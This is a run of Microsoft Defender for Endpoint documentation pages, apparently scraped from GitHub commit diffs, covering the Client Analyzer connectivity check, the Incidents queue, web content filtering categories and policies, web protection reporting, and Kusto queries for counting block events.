-> For the streamlined onboarding public preview, when testing connectivity on devices not yet onboarded to Defender for Endpoint, run `mdeclientanalyzer.cmd` with `-o <path to MDE onboarding package >`. The command will use geo parameters from the onboarding script to test connectivity. Otherwise, the default pre-onboarding test runs against the standard URL set. See the following section for more details.
-
-Verify that the proxy configuration is completed successfully. The WinHTTP can then discover and communicate through the proxy server in your environment, and then the proxy server allows traffic to the Defender for Endpoint service URLs.
-
-1. Download the [Microsoft Defender for Endpoint Client Analyzer tool](https://aka.ms/mdeanalyzer) where Defender for Endpoint sensor is running on.
-
-2. Extract the contents of MDEClientAnalyzer.zip on the device.
-
-3. Open an elevated command line:
-
- 1. Go to **Start** and type **cmd**.
- 2. Right-click **Command prompt** and select **Run as administrator**.
-
-4. Enter the following command and press **Enter**:
-
- ```command prompt
- HardDrivePath\MDEClientAnalyzer.cmd
- ```
-
- Replace *HardDrivePath* with the path, where the MDEClientAnalyzer tool was downloaded. For example:
-
- ```command prompt
- C:\Work\tools\MDEClientAnalyzer\MDEClientAnalyzer.cmd
- ```
-
-5. The tool creates and extracts the *MDEClientAnalyzerResult.zip* file in the folder to use in the *HardDrivePath*.
-
-6. Open *MDEClientAnalyzerResult.txt* and verify that you've performed the proxy configuration steps to enable server discovery and access to the service URLs.
-
- The tool checks the connectivity of Defender for Endpoint service URLs. Ensure the Defender for Endpoint client is configured to interact. The tool prints the results in the *MDEClientAnalyzerResult.txt* file for each URL that can potentially be used to communicate with the Defender for Endpoint services. For example:
-
- ```text
- Testing URL : https://xxx.microsoft.com/xxx
- 1 - Default proxy: Succeeded (200)
- 2 - Proxy auto discovery (WPAD): Succeeded (200)
- 3 - Proxy disabled: Succeeded (200)
- 4 - Named proxy: Doesn't exist
- 5 - Command line proxy: Doesn't exist
- ```
-
-If any one of the connectivity options returns a (200) status, then the Defender for Endpoint client can communicate with the tested URL properly using this connectivity method.
-
-However, if the connectivity check results indicate a failure, an HTTP error is displayed (see HTTP Status Codes). You can then use the URLs in the table shown in [Enable access to Defender for Endpoint service URLs in the proxy server](configure-environment.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server). The URLs available for use depend on the region selected during the onboarding procedure.
-
-> [!NOTE]
-> The Connectivity Analyzer tool's cloud connectivity checks are not compatible with Attack Surface Reduction rule [Block process creations originating from PSExec and WMI commands](attack-surface-reduction-rules-reference.md#block-process-creations-originating-from-psexec-and-wmi-commands). You will need to temporarily disable this rule, to run the connectivity tool. Alternatively, you can temporarily add [ASR exclusions](attack-surface-reduction-rules-deployment-implement.md#customize-attack-surface-reduction-rules) when running the analyzer.
->
-> When the TelemetryProxyServer is set in Registry or via Group Policy, Defender for Endpoint will fall back, it fails to access the defined proxy.
--
-## (Public preview) Testing connectivity to the streamlined onboarding method
-
-If you're testing connectivity on a device that hasn't yet been onboarded to Defender for Endpoint using the streamlined approach (relevant for both new and migrating devices):
-
-1. Download the streamlined onboarding package for relevant OS.
-
-2. Extract the .cmd from onboarding package.
-
-3. Follow the instructions in the previous section to download the Client Analyzer.
-
-4. Run `mdeclientanalyzer.cmd -o <path to onboarding cmd file>` from within the MDEClientAnalyzer folder. The command uses geo parameters from the onboarding script to test connectivity.
-
-If you're testing connectivity on a device onboarded to Defender for Endpoint using the streamlined onboarding package, run the Defender for Endpoint Client Analyzer as normal. The tool uses the configured onboarding parameters to test connectivity.
-
-For more info on how to access streamlined onboarding script, see [Onboarding devices using streamlined device connectivity](configure-device-connectivity.md).
-
-## Next step
-
-[Onboard Windows Client](onboard-windows-client.md)
-[Onboard Windows Server](onboard-windows-server.md)
-[Onboard non-Windows devices](configure-endpoints-non-windows.md)
security View Incidents Queue https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/view-incidents-queue.md
- Title: View and organize the Incidents queue-
-description: See the list of incidents and learn how to apply filters to limit the list and get a more focused view.
------- m365-security-- tier2-- mde-edr-- Previously updated : 01/24/2024--
-# View and organize the Microsoft Defender for Endpoint Incidents queue
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-> [!TIP]
-> For a limited time during January 2024, when you visit the **Incidents** page, Defender Boxed appears. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. To reopen Defender Boxed, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
--
-The **Incidents queue** shows a collection of incidents that were flagged from devices in your network. It helps you sort through incidents to prioritize and create an informed cybersecurity response decision.
-
-By default, the queue displays incidents seen in the last 6 months, with the most recent incident showing at the top of the list, helping you see the most recent incidents first.
-
-There are several options you can choose from to customize the Incidents queue view.
-
-On the top navigation you can:
-- Customize columns to add or remove columns -- Modify the number of items to view per page-- Select the items to show per page-- Batch-select the incidents to assign -- Navigate between pages-- Apply filters-- Customize and apply date ranges--
-## Sort and filter the incidents queue
-You can apply the following filters to limit the list of incidents and get a more focused view.
-
-### Severity
-
-Incident severity | Description
-:|:
-High </br>(Red) | Threats often associated with advanced persistent threats (APT). These incidents indicate a high risk due to the severity of damage they can inflict on devices.
-Medium </br>(Orange) | Threats rarely observed in the organization, such as anomalous registry change, execution of suspicious files, and observed behaviors typical of attack stages.
-Low </br>(Yellow) | Threats associated with prevalent malware and hack-tools that do not necessarily indicate an advanced threat targeting the organization.
-Informational </br>(Grey) | Informational incidents might not be considered harmful to the network but might be good to keep track of.
-
-## Assigned to
-You can choose to filter the list by selecting assigned to anyone or ones that are assigned to you.
-
-### Category
-Incidents are categorized based on the description of the stage by which the cybersecurity kill chain is in. This view helps the threat analyst to determine priority, urgency, and corresponding response strategy to deploy based on context.
-
-### Status
-You can choose to limit the list of incidents shown based on their status to see which ones are active or resolved.
-
-### Data sensitivity
-Use this filter to show incidents that contain sensitivity labels.
-
-## Incident naming
-
-To understand the incident's scope at a glance, incident names are automatically generated based on alert attributes such as the number of endpoints affected, users affected, detection sources or categories.
-
-For example: *Multi-stage incident on multiple endpoints reported by multiple sources.*
-
-> [!NOTE]
-> Incidents that existed prior the rollout of automatic incident naming will retain their name.
--
-## See also
-- [Incidents queue](/microsoft-365/security/defender-endpoint/view-incidents-queue)-- [Manage incidents](manage-incidents.md)-- [Investigate incidents](investigate-incidents.md)-
security Web Content Filtering https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-content-filtering.md
- Title: Web content filtering
-description: Use web content filtering in Microsoft Defender for Endpoint to track and regulate access to websites based on their content categories.
---- Previously updated : 02/02/2024---- m365-security-- tier2-- mde-asr-----
-# Web content filtering
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> [!TIP]
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-main-abovefoldlink&rtc=1)
--
-## What is web content filtering?
-
-Web content filtering is part of the [Web protection](web-protection-overview.md) capabilities in Microsoft Defender for Endpoint and Microsoft Defender for Business. Web content filtering enables your organization to track and regulate access to websites based on their content categories. Many of these websites (even if they're not malicious) might be problematic because of compliance regulations, bandwidth usage, or other concerns.
-
-Configure policies across your device groups to block certain categories. Blocking a category prevents users within specified device groups from accessing URLs associated with the category. For any category that's not blocked, the URLs are automatically audited. Your users can access the URLs without disruption, and you gather access statistics to help create a more custom policy decision. Your users see a block notification if an element on the page they're viewing is making calls to a blocked resource.
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-Web content filtering is available on the major web browsers, with blocks performed by Windows Defender SmartScreen (Microsoft Edge) and network protection (Chrome, Firefox, Brave, and Opera). For more information about browser support, see the [prerequisites](#prerequisites) section.
-
-> [!NOTE]
-> Web content filtering does not apply policies to isolated browser sessions (i.e. Microsoft Defender Application Guard). The feature is also restricted to specific browsers via process name. This means that web content filtering doesn't work when there is a local proxy application in place (such as Fiddler, ZScaler), due to the process name being masked.
-
-## Benefits of web content filtering
--- Users are prevented from accessing websites in blocked categories, whether they're browsing on-premises or away.-- Your security team can access web reports in the same central location, with visibility over actual blocks and web usage.-- If you're using Defender for Endpoint, your security team can conveniently deploy policies to groups of users using device groups defined in [Microsoft Defender for Endpoint role-based access control settings](/microsoft-365/security/defender-endpoint/rbac).-- If you're using Defender for Business, you can define one web content filtering policy that is applied to all users.-
-## Prerequisites
-
-Before trying out this feature, make sure you meet the requirements described in the following table:
-
-| Requirement | Description |
-|:|:|
-| Subscription | Your subscription must include one of the following plans:<br/>- [Windows 10/11 Enterprise E5](/windows/deployment/deploy-enterprise-licenses)<br/>- [Microsoft 365 E5](https://www.microsoft.com/microsoft-365/enterprise/e5?activetab=pivot%3aoverviewtab)<br/>- Microsoft 365 A5<br/>- Microsoft 365 E5 Security<br/>- [Microsoft 365 E3](https://www.microsoft.com/microsoft-365/enterprise/e3?activetab=pivot%3aoverviewtab)<br/>- [Microsoft Defender for Endpoint Plan 1 or Plan 2](../defender/eval-defender-endpoint-overview.md)<br/>- [Microsoft Defender for Business](../defender-business/mdb-overview.md)<br/>- [Microsoft 365 Business Premium](https://www.microsoft.com/microsoft-365/business/microsoft-365-business-premium)|
-| Portal access | You must have access to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>. |
-| Operating system | Your organization's devices must be running one of the following operating systems with the [latest antivirus/antimalware updates](microsoft-defender-antivirus-updates.md): <br/>- Windows 11<br/>- Windows 10 Anniversary Update (version 1607) or later <br/>- For information on macOS availability, see [Network Protection for macOS](network-protection-macos.md)<br/>- For information on Linux availability, see [Network Protection for Linux](network-protection-linux.md)|
-| Browser | Your organization's devices must be running one of the following browsers: <br/>- Microsoft Edge<br/>- Google Chrome<br/>- Mozilla FireFox<br/>- Brave<br/>- Opera<br/>- Internet Explorer|
-| Related protection | [Windows Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview) and [network protection](network-protection.md) must be enabled on your organization's devices. |
-
-## Data handling
-
-Data is stored in the region that was selected as part of your [Microsoft Defender for Endpoint data handling settings](data-storage-privacy.md). Your data won't leave the data center in that region. In addition, your data won't be shared with any third parties, including our data providers.
-
-## Precedence for multiple active policies
-
-Applying multiple different web content filtering policies to the same device results in applying the more restrictive policy for each category. Consider the following scenario:
--- **Policy 1**: blocks categories 1 and 2 and audits the rest-- **Policy 2**: blocks categories 3 and 4 and audits the rest-
-The result is that categories 1-4 are all blocked, as illustrated in the following image.
--
-## Turn on web content filtering
-
-1. Go to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **General** \> **Advanced Features**.
-
-3. Scroll down until you see **Web content filtering**.
-
-4. Switch the toggle to **On**, and then select **Save preferences**.
-
-### Configure web content filtering policies
-
-Web content filtering policies specify which site categories are blocked on which device groups. To manage the policies, go to **Settings** \> **Endpoints** \> **Web content filtering** (under **Rules**).
-
-Policies can be deployed to block any of the following parent or child categories:
-
-| Parent category | Child categories |
-|||
-| **Adult content** | - **Cults**: Sites related to groups or movements whose members demonstrate passion for a belief system that is different from those that are socially accepted.<br/><br/>- **Gambling**: Online gambling and sites that promote gambling skills and practice.<br/><br/>- **Nudity**: Sites that provide full-frontal and semi-nude images or videos, typically in artistic form, and might allow the download or sale of such materials.<br/><br/>- **Pornography / Sexually explicit**: Sites containing sexually explicit content in an image-based or textual form. Any form of sexually oriented material is also listed here.<br/><br/>- **Sex education**: Sites that discuss sex and sexuality in an informative and nonvoyeuristic way, including sites that provide education about human reproduction and contraception, sites that offer advice on preventing infection from sexual diseases, and sites that offer advice on sexual health matters.<br/><br/>- **Tasteless**: Sites oriented towards content unsuitable for school children to view or that an employer would be uncomfortable with their staff accessing, but not necessarily violent or pornographic.<br/><br/>- **Violence**: Sites that display or promote content related to violence against humans or animals. |
-| **High bandwidth** | - **Download sites**: Sites whose primary function is to allow users to download media content or programs, such as computer programs.<br/><br/>- **Image sharing**: Sites that are used primarily for searching or sharing photos, including those that have social aspects.<br/><br/>- **Peer-to-peer**: Sites that host peer-to-peer (P2P) software or facilitate the sharing of files using P2P software.<br/><br/>- **Streaming media & downloads**: Sites whose primary function is the distribution of streaming media, or sites that allow users to search, watch, or listen to streaming media. |
-| **Legal liability** | - **Child abuse images**: Sites that include child abuse images or pornography.<br/><br/>- **Criminal activity**: Sites that give instruction on, advice about, or promotion of illegal activities.<br/><br/>- **Hacking**: Sites that provide resources for illegal or questionable use of computer software or hardware, including sites that distribute copyrighted material that has been cracked.<br/><br/>- **Hate & intolerance**: Sites promoting aggressive, degrading, or abusive opinions about any section of the population that could be identified by race, religion, gender, age, nationality, physical disability, economic situation, sexual orientations or any other lifestyle choice.<br/><br/>- **Illegal drug**: Sites that sell illegal/controlled substances, promote substance abuse, or sell related paraphernalia.<br/><br/>- **Illegal software**: Sites that contain or promote the use of malware, spyware, botnets, phishing scams, or piracy & copyright theft.<br/><br/>- **School cheating**: Sites related to plagiarism or school cheating.<br/><br/>- **Self-harm**: Sites that promote self-harm, including cyberbullying sites that contain abusive and/or threatening messages towards users.<br/><br/>- **Weapons**: Any site that sells weapons or advocates the use of weapons, including but not limited to guns, knives, and ammunition. |
-| **Leisure** | - **Chat**: Sites that are primarily web-based chat rooms.<br/><br/>- **Games**: Sites relating to video or computer games, including sites that promote gaming through hosting online services or information related to gaming.<br/><br/>- **Instant messaging**: Sites that can be used to download instant messaging software or client based instant messaging.<br/><br/>- **Professional network**: Sites that provide professional networking services.<br/><br/>- **Social networking**: Sites that provide social networking services.<br/><br/>- **Web-based email**: Sites offering web-based mail services. |
-| **Uncategorized** | - **Newly registered domains**: Sites that are newly registered in the past 30 days and haven't yet been moved to another category.<br/><br/>- **Parked domains**: Sites that have no content or are parked for later use. |
-
-> [!NOTE]
-> Uncategorized contains only newly registered domains and parked domains, and does not include all other sites outside of these categories.
-
-### Create a policy
-
-To add a new policy, follow these steps:
-
-1. In the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, choose **Settings** > **Endpoints** > **Web content filtering** > **+ Add policy**.
-
-2. Specify a name.
-
-3. Select the categories to block. Use the expand icon to fully expand each parent category and select specific web content categories.
-
-4. Specify the policy scope. Select the device groups to specify where to apply the policy. Only devices in the selected device groups will be prevented from accessing websites in the selected categories.
-
- > [!IMPORTANT]
- > If you're using either Microsoft 365 Business Premium or Defender for Business, your web content filtering policy is applied to all users by default. Scoping does not apply.
-
-5. Review the summary and save the policy.
-
-> [!NOTE]
-> - There might be up to 2 hours of latency between the time a policy is created and when it's enforced on the device.
-> - You can deploy a policy without selecting any category on a device group. This action creates an audit-only policy to help you understand user behavior before creating a block policy.
-> - If you are removing a policy or changing device groups at the same time, there could be a delay in policy deployment.
-> - Blocking the "Uncategorized" category could lead to unexpected and undesired results.
-
-## End-user experience
-
-The blocking experience for third-party supported browsers is provided by network protection, which provides a system-level message notifying the user of a blocked connection. For a more user-friendly, in-browser experience, consider using Microsoft Edge.
-
-The following experience is shown for all Web Content Filtering blocks, beginning in Microsoft Edge version 124.
--
-### Allow specific websites
-
-It's possible to override the blocked category in web content filtering to allow a single site by creating a custom indicator policy. The custom indicator policy supersedes the web content filtering policy when it's applied to the device group in question.
-
-To define a custom indicator, follow these steps:
-
-1. In the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, go to **Settings** \> **Endpoints** \> **Indicators** \> **URL/Domain** \> **Add Item**.
-
-2. Enter the domain of the site.
-
-3. Set the policy action to **Allow**.
-
-### Dispute categories
-
-If you encounter a domain that has been incorrectly categorized, you can dispute the category directly from the Microsoft Defender portal.
-
-To dispute the category of a domain, navigate to **Reports** \> **Web protection** \> **Web content filtering categories details** \> **Domains**. On the domains tab of the Web Content Filtering reports, find the ellipsis beside each of the domains. Hover over the ellipsis and then select **Dispute Category**.
-
-A panel opens where you can select the priority and add more details such as the suggested category for recategorization. Once you complete the form, select **Submit**. Our team will review the request within one business day. For immediate unblocking, create a [custom allow indicator](indicator-ip-domain.md).
-
-## Web content filtering cards and details
-
-Select **Reports** \> **Web protection** to view cards with information about web content filtering and web threat protection. The following cards provide summary information about web content filtering.
-
-### Web activity by category
-
-This card lists the parent web content categories with the largest increase or decrease in the number of access attempts. Understand drastic changes in web activity patterns in your organization from last 30 days, 3 months, or 6 months. Select a category name to view more information.
-
-In the first 30 days of using this feature, your organization might not have enough data to display this information.
--
-### Web content filtering summary card
-
-This card displays the distribution of blocked access attempts across the different parent web content categories. Select one of the colored bars to view more information about a specific parent web category.
--
-### Web activity summary card
-
-This card displays the total number of requests for web content in all URLs.
--
-### View card details
-
-You can access the **Report details** for each card by selecting a table row or colored bar from the chart in the card. The report details page for each card contains extensive statistical data about web content categories, website domains, and device groups.
---- **Web categories**: Lists the web content categories that have had access attempts in your organization. Select a specific category to open a summary flyout.--- **Domains**: Lists the web domains that have been accessed or blocked in your organization. Select a specific domain to view detailed information about that domain.--- **Device groups**: Lists all the device groups that have generated web activity in your organization-
-Use the time range filter at the top left of the page to select a time period. You can also filter the information or customize the columns. Select a row to open a flyout pane with even more information about the selected item.
-
-### Known issues and limitations
-
-Network protection does not currently support SSL inspection, which might result in some sites being allowed by web content filtering that would normally be blocked. Sites would be allowed due to a lack of visibility into encrypted traffic after the TLS handshake has taken place and an inability to parse certain redirects. This includes redirections from some web-based mail login pages to the mailbox page. As an accepted workaround, you can create a custom block indicator for the login page to ensure no users are able to access the site. Keep in mind, this might block their access to other services associated with the same website.
-
-If you are using Microsoft 365 Business Premium or Microsoft Defender for Business, you can define one web content filtering policy for your environment. That policy will apply to all users by default.
-
-## See also
--- [Web protection overview](web-protection-overview.md)-- [Web threat protection](web-threat-protection.md)-- [Monitor web security](web-protection-monitoring.md)-- [Respond to web threats](web-protection-response.md)-- [Requirements for Network Protection](web-content-filtering.md)
security Web Protection Monitoring https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-protection-monitoring.md
- Title: Monitoring web browsing security in Microsoft Defender for Endpoint
-description: Use web protection in Microsoft Defender for Endpoint to monitor web browsing security
------- m365-security-- tier2-- mde-asr-- Previously updated : 12/18/2020--
-# Monitor web browsing security
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-main-abovefoldlink&rtc=1)
-
-Web protection lets you monitor your organization's web browsing security through reports under **Reports > Web protection** in the Microsoft Defender portal. The report contains cards that provide web threat detection statistics.
--- **Web threat protection detections over time** - this trending card displays the number of web threats detected by type during the selected time period (Last 30 days, Last 3 months, Last 6 months)-
- :::image type="content" source="media/wtp-blocks-over-time.png" alt-text="The card showing web threats protection detections over time" lightbox="media/wtp-blocks-over-time.png":::
--- **Web threat protection summary** - this card displays the total web threat detections in the past 30 days, showing distribution across the different types of web threats. Selecting a slice opens the list of the domains that were found with malicious or unwanted websites.-
- :::image type="content" source="media/wtp-summary.png" alt-text="The card showing web threats protection summary" lightbox="media/wtp-summary.png":::
-
-> [!NOTE]
-> It can take up to 12 hours before a block is reflected in the cards or the domain list.
-
-## Types of web threats
-
-Web protection categorizes malicious and unwanted websites as:
--- **Phishing** - websites that contain spoofed web forms and other phishing mechanisms designed to trick users into divulging credentials and other sensitive information-- **Malicious** - websites that host malware and exploit code-- **Custom indicator** - websites whose URLs or domains you've added to your [custom indicator list](manage-indicators.md) for blocking-
-## View the domain list
-
-Select a specific web threat category in the **Web threat protection summary** card to open the **Domains** page. This page displays the list of the domains under that threat category. The page provides the following information for each domain:
--- **Access count** - number of requests for URLs in the domain-- **Blocks** - number of times requests were blocked-- **Access trend** - change in number of access attempts-- **Threat category** - type of web threat-- **Devices** - number of devices with access attempts-
-Select a domain to view the list of devices that have attempted to access URLs in that domain and the list of URLs.
-
-## Related topics
--- [Web protection overview](web-protection-overview.md)-- [Web content filtering](web-content-filtering.md)-- [Web threat protection](web-threat-protection.md)-- [Respond to web threats](web-protection-response.md)
security Web Protection Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-protection-overview.md
- Title: Web protection
-description: Learn about the web protection in Microsoft Defender for Endpoint and how it can protect your organization.
--- Previously updated : 04/03/2024---- m365-security-- tier2-- mde-asr-----
-# Web protection
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-main-abovefoldlink&rtc=1)
-
-## About web protection
-
-Web protection in Microsoft Defender for Endpoint is a capability made up of [Web threat protection](web-threat-protection.md), [Web content filtering](web-content-filtering.md), and [Custom indicators](manage-indicators.md). Web protection lets you secure your devices against web threats and helps you regulate unwanted content. You can find Web protection reports in the Microsoft Defender portal by going to **Reports > Web protection**.
--
-### Web threat protection
-
-The cards that make up web threat protection are **Web threat detections over time** and **Web threat summary**.
-
-Web threat protection includes:
--- Comprehensive visibility into web threats affecting your organization.-- Investigation capabilities over web-related threat activity through alerts and comprehensive profiles of URLs and the devices that access these URLs.-- A full set of security features that track general access trends to malicious and unwanted websites.-
-> [!NOTE]
-> For processes other than Microsoft Edge and Internet Explorer, web protection scenarios leverage Network Protection for inspection and enforcement:
->
-> - IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS)).
-> - Only single IP addresses are supported (no CIDR blocks or IP ranges) in custom indicators.
-> - Encrypted URLs (full path) can only be blocked on first party browsers (Internet Explorer, Edge).
-> - Encrypted URLs (FQDN only) can be blocked in third party browsers (i.e. other than Internet Explorer, Edge).
-> - Full URL path blocks can be applied for unencrypted URLs.
->
-> There may be up to 2 hours of latency (usually less) between the time the action is taken, and the URL and IP being blocked.
-
-For more information, see [Web threat protection](web-threat-protection.md).
-
-### Custom indicators
-
-Custom indicator detections are also summarized in your organizations web threat reports under **Web threat detections over time** and **Web threat summary**.
-
-Custom indicator includes:
--- Ability to create IP and URL-based indicators of compromise to protect your organization against threats.-- Investigation capabilities over activities related to your custom IP/URL profiles and the devices that access these URLs.-- The ability to create Allow, Block, and Warn policies for IPs and URLs.-
-For more information, see [Create indicators for IPs and URLs/domains](indicator-ip-domain.md)
-
-### Web content filtering
-
-Web content filtering includes **Web activity by category**, **Web content filtering summary**, and **Web activity summary**.
-
-Web content filtering includes:
--- Users are prevented from accessing websites in blocked categories, whether they're browsing on-premises or away.-- You can conveniently deploy varied policies to various sets of users using the device groups defined in the [Microsoft Defender for Endpoint role-based access control settings](/microsoft-365/security/defender-endpoint/rbac).
- > [!NOTE]
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-- You can access web reports in the same central location, with visibility over actual blocks and web usage.-
-For more information, see [Web content filtering](web-content-filtering.md).
-
-## Order of precedence
-
-Web protection is made up of the following components, listed in order of precedence. Each of these components is enforced by the SmartScreen client in Microsoft Edge and by the Network Protection client in all other browsers and processes.
--- Custom indicators (IP/URL, Microsoft Defender for Cloud Apps policies)
- - Allow
- - Warn
- - Block
--- Web threats (malware, phish)
- - SmartScreen Intel, including Exchange Online Protection (EOP)
- - Escalations
--- Web Content Filtering (WCF)-
-> [!NOTE]
-> Microsoft Defender for Cloud Apps currently generates indicators only for blocked URLs.
-
-The order of precedence relates to the order of operations by which a URL or IP is evaluated. For example, if you have a web content filtering policy you can create exclusions through custom IP/URL indicators. Custom Indicators of compromise (IoC) are higher in the order of precedence than WCF blocks.
-
-Similarly, during a conflict between indicators, allows always take precedence over blocks (override logic). That means that an allow indicator takes precedence over any block indicator that is present.
-
-The following table summarizes some common configurations that would present conflicts within the web protection stack. It also identifies the resulting determinations based on the precedence described earlier in this article.
-
-|Custom Indicator policy|Web threat policy|WCF policy|Defender for Cloud Apps policy|Result|
-||||||
-|Allow|Block|Block|Block|Allow (Web protection override)|
-|Allow|Allow|Block|Block|Allow (WCF exception)|
-|Warn|Block|Block|Block|Warn (override)|
-
-Internal IP addresses aren't supported by custom indicators. For a warn policy when bypassed by the end user, the site is unblocked for 24 hours for that user by default. This time frame can be modified by the Admin and is passed down by the SmartScreen cloud service. The ability to bypass a warning can also be disabled in Microsoft Edge using CSP for web threat blocks (malware/phishing). For more information, see [Microsoft Edge SmartScreen Settings](/DeployEdge/microsoft-edge-policies#smartscreen-settings-policies).
-
-## Protect browsers
-
-In all web protection scenarios, SmartScreen and Network Protection can be used together to ensure protection across both Microsoft and non-Microsoft browsers and processes. SmartScreen is built directly into Microsoft Edge, while Network Protection monitors traffic in non-Microsoft browsers and processes. The following diagram illustrates this concept. This diagram of the two clients working together to provide multiple browser/app coverages is accurate for all features of Web Protection (Indicators, Web Threats, Content Filtering).
--
-## Troubleshoot endpoint blocks
-
-Responses from the SmartScreen cloud are standardized. Tools like Fiddler can be used to inspect the response from the cloud service, which helps determine the source of the block.
-
-When the SmartScreen cloud service responds with an allow, block, or warn response, a response category and server context is relayed back to the client. In Microsoft Edge, the response category is what is used to determine the appropriate block page to show (malicious, phishing, organizational policy).
-
-The following table shows the responses and their correlated features.
-
-|ResponseCategory|Feature responsible for the block|
-|||
-|CustomPolicy|WCF|
-|CustomBlockList|Custom indicators|
-|CasbPolicy|Defender for Cloud Apps|
-|Malicious|Web threats|
-|Phishing|Web threats|
-
-## Advanced hunting for web protection
-
-Kusto queries in advanced hunting can be used to summarize web protection blocks in your organization for up to 30 days. These queries use the information listed above to distinguish between the various sources of blocks and summarize them in a user-friendly manner. For example, the following query lists all WCF blocks originating from Microsoft Edge.
-
-```kusto
-DeviceEvents
-| where ActionType == "SmartScreenUrlWarning"
-| extend ParsedFields=parse_json(AdditionalFields)
-| project DeviceName, ActionType, Timestamp, RemoteUrl, InitiatingProcessFileName, Experience=tostring(ParsedFields.Experience)
-| where Experience == "CustomPolicy"
-```
-
-Similarly, you can use the following query to list all WCF blocks originating from Network Protection (for example, a WCF block in a non-Microsoft browser). The `ActionType` is updated and `Experience` changed to `ResponseCategory`.
-
-```kusto
-DeviceEvents
-| where ActionType == "ExploitGuardNetworkProtectionBlocked"
-| extend ParsedFields=parse_json(AdditionalFields)
-| project DeviceName, ActionType, Timestamp, RemoteUrl, InitiatingProcessFileName, ResponseCategory=tostring(ParsedFields.ResponseCategory)
-| where ResponseCategory == "CustomPolicy"
-```
-
-To list blocks that are due to other features (like Custom Indicators), refer to the table listed earlier in this article. The table outlines each feature and their respective response category. These queries can be modified to search for telemetry related to specific machines in your organization. The ActionType shown in each query shows only those connections that were blocked by a Web Protection feature, and not all network traffic.
-
-## User experience
-
-If a user visits a web page that poses a risk of malware, phishing, or other web threats, Microsoft Edge triggers a block page that resembles the following image:
--
-Beginning with Microsoft Edge 124, the following block page is shown for all Web Content Filtering category blocks.
--
-In any case, no block pages are shown in non-Microsoft browsers, and the user sees a "Secure Connection Failed" page along with a toast notification. Depending on the policy responsible for the block, a user sees a different message in the toast notification. For example, web content filtering displays the message, "This content is blocked."
-
-## Report false positives
-
-To report a false positive for sites that have been deemed dangerous by SmartScreen, use the link that appears on the block page in Microsoft Edge (as shown earlier in this article).
-
-For WCF, you can dispute the category of a domain. Navigate to the **Domains** tab of the WCF reports. You see an ellipsis beside each of the domains. Hover over this ellipsis and select **Dispute Category**. A flyout opens. Set the priority of the incident and provide some other details, such as the suggested category. For more information on how to turn on WCF and how to dispute categories, see [Web content filtering](web-content-filtering.md).
-
-For more information on how to submit false positives/negatives, see [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md).
-
-## Related information
-
-|Article|Description|
-|||
-|[Web threat protection](web-threat-protection.md) | Prevent access to phishing sites, malware vectors, exploit sites, untrusted or low-reputation sites, and sites that are blocked.|
-|[Web content filtering](web-content-filtering.md) | Track and regulate access to websites based on their content categories.|
-
security Web Protection Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-protection-response.md
- Title: Respond to web threats in Microsoft Defender for Endpoint
-description: Respond to alerts related to malicious and unwanted websites. Understand how web threat protection informs end users through their web browsers and Windows notifications
